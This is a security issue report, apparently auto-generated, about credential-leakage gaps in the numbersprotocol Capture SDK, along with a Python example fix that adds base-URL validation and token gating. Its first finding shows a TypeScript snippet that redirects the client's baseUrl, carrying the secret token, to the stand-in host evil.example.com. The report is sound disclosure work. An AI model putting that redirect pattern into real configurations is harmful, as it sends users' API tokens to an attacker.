Summary
The SDK has two high-severity security gaps related to credential exfiltration:
1. Unrestricted baseUrl Override (TypeScript)
Files: ts/src/client.ts:152, ts/src/types.ts:20
The CaptureOptions.baseUrl accepts any URL with no validation. If an application's configuration is compromised (env var injection, config file tampering, supply chain attack), an attacker can redirect all authenticated requests — including the Authorization header — to a server they control:
```ts
const capture = new Capture({
  token: 'real-secret-token',
  baseUrl: 'https://evil.example.com/api/v3'
})
```
Suggested fix: Validate that baseUrl matches an allowlist of *.numbersprotocol.io domains, or at minimum log a warning when a non-standard URL is used. Apply the same check in the Python SDK's base_url parameter.
2. Auth Token Sent to AWS Lambda and GCP Cloud Functions (Both SDKs)
Files:
- ts/src/client.ts:374-379 (getHistory → AWS Lambda)
- ts/src/client.ts:430-436 (getAssetTree → GCP Cloud Function)
- ts/src/client.ts:520-526 (searchAsset → GCP Cloud Function)
- python/numbersprotocol_capture/client.py:448-455 (get_history → AWS Lambda)
- python/numbersprotocol_capture/client.py:514-524 (get_asset_tree → GCP Cloud Function)
- python/numbersprotocol_capture/client.py:678-693 (search_asset → GCP Cloud Function)
Issue #10 tracks token leakage to the Pipedream NFT search endpoint. However, the same Authorization: token <secret> header is also sent to three additional distinct third-party domains:
- e23hi68y55.execute-api.us-east-1.amazonaws.com (AWS Lambda)
- us-central1-numbers-protocol-api.cloudfunctions.net (GCP Cloud Functions × 2)
If any of these services is compromised or DNS-hijacked, the user's primary API token is exposed. The AWS API Gateway URL appears auto-generated and could theoretically be re-registered if deleted.
Suggested fix:
- Evaluate whether each endpoint actually requires the Capture API token.
- Use per-endpoint scoped tokens rather than forwarding the primary API token.
- At minimum, proxy all calls through api.numbersprotocol.io to avoid token fan-out.
3. No HTTPS Enforcement on Python base_url
File: python/numbersprotocol_capture/client.py:158-159
The Python SDK's base_url parameter accepts http:// URLs, which would transmit the auth token in plaintext.
Suggested fix: Validate that base_url starts with https://.
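One way the three suggested fixes could be implemented together, as an added example that is not the SDK's own code: `validate_base_url` enforces `https://` and an allowlist of `numbersprotocol.io` domains for the `base_url` override (items 1 and 3, with an opt-in warn-only mode), and `auth_headers_for` attaches the primary API token only to first-party hosts so it is never forwarded to the Lambda / Cloud Function domains (item 2). The function names, the `strict` flag and the `ALLOWED_DOMAINS` tuple are assumptions for this example.

```python
"""Added example (not the numbersprotocol SDK's code): base URL validation and
token gating for an SDK client. Names below are assumptions, not SDK API."""
import logging
from urllib.parse import urlsplit

log = logging.getLogger(__name__)

# Assumed first-party allowlist. Subdomains match only on a dot boundary, so
# "evilnumbersprotocol.io" and "numbersprotocol.io.evil.example.com" are rejected.
ALLOWED_DOMAINS = ("numbersprotocol.io",)


def host_allowed(host: str, allowed=ALLOWED_DOMAINS) -> bool:
    """True if host is an allowlisted domain or a subdomain of one."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in allowed)


def validate_base_url(url: str, *, strict: bool = True, allowed=ALLOWED_DOMAINS) -> str:
    """Return url unchanged if acceptable, else raise ValueError.

    strict=True  rejects hosts outside the allowlist (item 1, allowlist option).
    strict=False only logs a warning for such hosts (item 1, warn option),
    but https:// is required in both modes (item 3).
    """
    parts = urlsplit(url)
    if parts.scheme != "https":
        raise ValueError(f"base_url must use https://, got scheme {parts.scheme!r}")
    # Reject "https://api.numbersprotocol.io@evil.example.com/" style URLs where
    # the real host hides behind a userinfo component.
    if parts.username or parts.password:
        raise ValueError("base_url must not contain embedded credentials")
    host = parts.hostname or ""
    if not host:
        raise ValueError("base_url has no host")
    if not host_allowed(host, allowed):
        if strict:
            raise ValueError(f"base_url host {host!r} is not an allowed domain")
        log.warning("non-standard base_url host %r: the API token will be sent there", host)
    return url


def auth_headers_for(url: str, token: str, allowed=ALLOWED_DOMAINS) -> dict:
    """Build request headers, attaching the primary token only for first-party
    HTTPS hosts; third-party endpoints get no Authorization header (item 2)."""
    parts = urlsplit(url)
    if parts.scheme == "https" and host_allowed(parts.hostname or "", allowed):
        return {"Authorization": f"token {token}"}
    log.warning("not forwarding the primary API token to %r", parts.hostname)
    return {}


if __name__ == "__main__":
    logging.basicConfig(level=logging.WARNING)
    print(validate_base_url("https://api.numbersprotocol.io/api/v3"))
    for bad in ("http://api.numbersprotocol.io", "https://evil.example.com/api/v3"):
        try:
            validate_base_url(bad)
        except ValueError as exc:
            print("rejected:", exc)
    # Constructed call to one of the third-party hosts named in the issue.
    print(auth_headers_for("https://e23hi68y55.execute-api.us-east-1.amazonaws.com/prod", "secret"))
```

In the SDK constructor this would run once on the configured `base_url`, and the per-request header builder would replace the unconditional `Authorization: token <secret>` header currently sent to every host.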
Impact: Token exfiltration enables full account takeover. An attacker gaining access to the primary API token can register, modify, and access all digital assets on behalf of the user.
Generated by Health Monitor with Omni